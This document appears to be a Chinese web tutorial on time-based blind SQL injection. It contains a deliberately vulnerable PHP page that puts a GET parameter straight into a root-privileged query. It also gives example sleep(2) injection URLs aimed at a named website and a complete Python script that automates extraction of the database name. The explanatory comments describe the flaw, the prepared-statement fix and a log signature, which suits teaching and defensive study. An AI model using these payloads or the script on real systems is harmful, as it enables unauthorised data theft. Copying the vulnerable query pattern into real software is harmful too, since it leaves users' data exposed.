延时注入php演示源码
<?php
// Deliberately vulnerable demo: the request parameter is interpolated straight
// into SQL (see the $sql line). NOTE: the mysql_* extension was removed in
// PHP 7, so this only runs on PHP 5.x.
// The demo connects as the MySQL root account, so anything injected into the
// query below runs with full database privileges.
$link= mysql_connect("localhost","root","root");
mysql_select_db("test",$link);
// Injection point: $_GET['id'] is concatenated unescaped inside a quoted
// literal, so a quote in `id` ends the literal and the rest of the parameter
// is executed as SQL. The fix is a prepared statement with `id` bound as a
// parameter (mysqli / PDO) rather than string building.
$sql= "select name from cms where id='{$_GET['id']}'";
// Echoing the assembled statement also discloses the query text to the client.
echo $sql;
// The result set is never read, so apart from the echoed SQL the only
// observable signal is how long the request takes (hence "time-based").
mysql_query($sql);
?>
获取数据库长度
http://www.nvhack.com/sql/sql.php?id=1' and if(length(database()) = 4, sleep(2),1)--+
开始判断数据库字符
http://www.nvhack.com/sql/sql.php?id=1' and if(ascii(substring(database(),1,1)) = 116, sleep(2),1)--+代码如下
- # -*- coding: utf-8 -*-
- import requests
- import threading
- import datetime
# Shared state: the length of the value named by getType (user(), database()
# or version()), written by loadDataPublicLength once a probe matches.
length = 0
def loadDataPublicLength(url,i,getType,afterstr):
    """Probe whether the value named by *getType* has length *i*.

    Sends one request whose injected condition calls sleep(2) only when the
    length equals *i*. On a match the length is stored in the module-level
    ``length`` and character extraction is started via getName().
    """
    if isTrue(url + ' and if(length('+ getType +') = ' + str(i)+ ', sleep(2),1)'+afterstr):
        print('得到结果,长度为:'+ str(i))
        global length
        length = i
        # Runs on the probing thread; getName() reads ``length`` set just above.
        getName()
# Shared state: recovered characters keyed by 0-based position, filled in by
# loadDataPublicName. No lock guards it; the threads that write it are
# started and joined one at a time (see getName).
nameStr = {}
def loadDataPublicName(url, i,getType,afterstr):
    """Recover character *i* (1-based) of the value named by *getType*.

    Narrows the character's ASCII code between ``min`` and ``max`` with
    sleep(2)-timed comparisons (>, <, =) and stores the result in
    ``nameStr[i-1]``. The loop only exits on a successful '=' probe, so a
    mistimed response simply causes another round of requests.
    """
    # Search bounds on the ASCII code; these names shadow the builtins min/max.
    min = 32
    max = 127
    while True:
        center = int((min + max) / 2)
        if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) > ' + str(center) +', sleep(2),1)'+ afterstr):
            min = center
            continue
        if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) < ' + str(center) +', sleep(2),1)'+ afterstr):
            max = center
            continue
        if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) = ' + str(center) +', sleep(2),1)'+ afterstr):
            # ``global`` is not needed for item assignment but is harmless here.
            global nameStr
            nameStr[i-1]=chr(center)
            #print(nameStr)
            break
    # Printed after every character is recovered.
    print(nameStr.values())
def isTrue(urlStr):
    """Return True when fetching *urlStr* took at least 2 whole seconds.

    The threshold matches the sleep(2) the callers embed in the injected
    condition. The response body is fetched and discarded.
    """
    # Every probe URL is printed and sent verbatim, so the injected
    # ``sleep(2)`` conditions typically show up as-is in the web server's
    # access log -- an easy signature for detection.
    print(urlStr)
    starttime = datetime.datetime.now() # time just before the request is sent
    # ``re`` is just the decoded body here (not the re module) and is unused.
    # No timeout is set, so a hung request blocks this thread indefinitely.
    re = requests.get(urlStr).content.decode('utf8')
    endtime = datetime.datetime.now() # time after the response arrived
    # timedelta.seconds is the whole-seconds component (truncated), so a
    # 1.9 s response counts as 1 and is reported as False.
    res = (endtime - starttime).seconds
    if int(res) >= 2:
        return True
    else:
        return False
################# Length probing
def getLength():
    """Probe lengths 1 through 19 with loadDataPublicLength.

    Reads the module-level ``url``, ``getType`` and ``afterstr`` that are
    assigned under ``__main__``.
    """
    threads1 = []
    for j in range(1,20):
        t = threading.Thread(target=loadDataPublicLength,args=(url,j,getType,afterstr,))
        threads1.append(t)
    for t1 in threads1:
        #t.setDaemon(True)
        t1.start()
        # join() immediately after start() runs the probes one at a time,
        # in order -- the threads add no concurrency.
        t1.join()
################ Character extraction; one thread per position, count taken from ``length``
def getName():
    """Recover every character of the value, one position at a time.

    Called from loadDataPublicLength after ``length`` has been set; reads the
    module-level ``url``, ``getType`` and ``afterstr``.
    """
    threads2 = []
    for j in range(1,length+1):
        t = threading.Thread(target=loadDataPublicName,args=(url,j,getType,afterstr,))
        threads2.append(t)
    for t2 in threads2:
        t2.start()
        # start() followed by join() makes the positions run sequentially.
        t2.join()
if __name__ == '__main__':
    # Script entry: these three module-level names are read by getLength()
    # and getName(); they exist only when the file is run as a script.
    url = 'http://www.nvhack.com/sql/sql.php?id=1\' ' # base URL ending at the injection point (note the trailing quote)
    afterstr = '--+' # comment sequence appended after the condition; empty if none is needed
    getType = 'database()' # SQL expression whose value is extracted
    getLength()
# 获取长度仅需几秒
# 获取数据库名字,要比SQLmap快很多